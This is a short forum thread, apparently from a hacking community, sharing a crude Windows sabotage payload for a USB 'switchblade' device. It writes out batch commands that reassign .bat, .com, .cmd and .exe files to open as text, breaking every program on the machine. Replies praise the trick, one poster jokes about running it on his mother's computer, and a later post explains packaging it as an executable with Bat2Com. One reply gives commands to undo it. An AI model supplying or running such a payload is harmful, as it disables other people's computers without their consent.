idea for a simple, yet deadly mini-payload

kz26

Here's the idea. Actually, it was a friend that gave this to me.

In your switchblade payload's main batch script, add something like:

assoc .bat=txtfile

assoc .com=txtfile

assoc .cmd=txtfile

assoc .exe=txtfile

This, obviously, could be pretty bad since all executables are now treated as text files.

Now, please don't start ripping on this as "newbish" or "pointless". If you REALLY want to do some damage, here's a simple, fast, and crude way of doing it.

wow that would be really bad. . .  but it is a neat trick :D  Also, there is no need for that to be treated as

"newbish" or "pointless"
, because you're right that would really screw things up for someone, especially if they don't know what they are doing. (like my mom, I might have to try it on her computer,  :twisted:)

well if you think about it, it's not that hard to fix once you've got tired of it.  :P

assoc .bat=batfile
assoc .com=comfile
assoc .cmd=cmdfile
assoc .exe=exefile

done, and everything's back to the way it was  8-)

When you think about it, it _would_ be slightly difficult for people who try to run, say, cmd.exe, and have it open as a textfile. If they didn't know how to get to a command prompt *cough*Safe Mode*cough* then things could really be interesting for them.

We had a virus problem at work a few years ago, where the virus assosicated itself with every executable file there was. Problem was, the boss deleted the virus file before telling me about it, so there I am, trying to reset things, without being to get to a command prompt or regedit.

would it be possible for you to make this  into an exe or someway that  it didnt auto run on every computer u stick it in?

Yeah, just make a batch file called assoc.bat or something like that.

assoc .bat=txtfile
assoc .com=txtfile
assoc .cmd=txtfile
assoc .exe=txtfile

Then, just run it to use the payload. If you want an .exe use Bat2Com to make it into a .com, then rename the .com to .exe (com and exe are pretty much the same thing).